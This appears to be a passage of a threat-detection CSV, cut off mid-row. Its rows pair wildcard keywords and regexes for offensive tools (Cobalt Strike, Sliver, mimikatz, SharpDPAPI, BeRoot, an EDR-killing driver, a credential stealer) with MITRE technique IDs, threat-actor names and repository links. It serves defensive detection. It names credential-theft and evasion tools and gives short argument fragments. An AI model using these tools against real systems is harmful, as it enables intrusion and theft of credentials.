"* beacon.dll*",".{0,1000}\sbeacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","378"
"* beacon_win_default*",".{0,1000}\sbeacon_win_default.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","379"
"* --beacon=*",".{0,1000}\s\-\-beacon\=.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","380"
"* beacon64.bin *",".{0,1000}\sbeacon64\.bin\s.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","381"
"* Benjamin DELPY *",".{0,1000}\sBenjamin\sDELPY\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#content","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","382"
"* beRoot.exe*",".{0,1000}\sbeRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","383"
"* beRoot.py*",".{0,1000}\sbeRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","384"
"* bettercap*",".{0,1000}\sbettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","385"
"* --bf-hashes-file *",".{0,1000}\s\-\-bf\-hashes\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","386"
"* --bf-passwords-file *",".{0,1000}\s\-\-bf\-passwords\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","387"
"* --bhdump *",".{0,1000}\s\-\-bhdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","388"
"* bhqc.py -*",".{0,1000}\sbhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","389"
"* bin2mac.py*",".{0,1000}\sbin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","391"
"* -bindPipe * -destHost * -destPort *",".{0,1000}\s\-bindPipe\s.{0,1000}\s\-destHost\s.{0,1000}\s\-destPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","392"
"* bitcoin-getaddr.nse*",".{0,1000}\sbitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","393"
"* bitcoin-info.nse*",".{0,1000}\sbitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","394"
"* bitcoinrpc-info.nse*",".{0,1000}\sbitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","395"
"* BITSInject.py*",".{0,1000}\sBITSInject\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","396"
"* BITSJobPayloads.py*",".{0,1000}\sBITSJobPayloads\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","397"
"* bittorrent-discovery.nse*",".{0,1000}\sbittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","398"
"* bjnp-discover.nse*",".{0,1000}\sbjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","399"
"* Blackout.cpp*",".{0,1000}\sBlackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","400"
"* Blackout.sln*",".{0,1000}\sBlackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","401"
"* Blackout.sys*",".{0,1000}\sBlackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","402"
"* BlankOBF.py*",".{0,1000}\sBlankOBF\.py.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","403"
"* BlankOBFv2.py*",".{0,1000}\sBlankOBFv2\.py.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","404"
"* bleeding-jumbo john*",".{0,1000}\sbleeding\-jumbo\sjohn.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","405"
"* blindeventlog.exe*",".{0,1000}\sblindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","406"
"* blob /target:*.bin* /pvk:*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","407"
"* blob /target:*.bin* /unprotect*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","408"
"* block_dll_policy.exe*",".{0,1000}\sblock_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","409"
"* --blockDLLs --ruy-lopez*",".{0,1000}\s\-\-blockDLLs\s\-\-ruy\-lopez.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","1","N/A","N/A","N/A","N/A","410"
"* --bloodhound --import-data *",".{0,1000}\s\-\-bloodhound\s\-\-import\-data\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","411"
"* --bloodhound --mark-owned *",".{0,1000}\s\-\-bloodhound\s\-\-mark\-owned\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","412"
"* --bloodhound --ns ip --collection All*",".{0,1000}\s\-\-bloodhound\s\-\-ns\sip\s\-\-collection\sAll.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","413"
"* --bloodhound --sync *",".{0,1000}\s\-\-bloodhound\s\-\-sync\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","414"
"* --bloodhound-file *",".{0,1000}\s\-\-bloodhound\-file\s.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","415"
"* bloodhoundsync.py*",".{0,1000}\sbloodhoundsync\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","416"
"* bof_allocator *",".{0,1000}\sbof_allocator\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","417"
"* bof_reg_collect_parser.py*",".{0,1000}\sbof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","418"
"* bof_reuse_memory *",".{0,1000}\sbof_reuse_memory\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","419"
"* -BOFBytes *",".{0,1000}\s\-BOFBytes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","420"
"* bofhound.py*",".{0,1000}\sbofhound\.py.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","421"
"* BOFNET *",".{0,1000}\sBOFNET\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 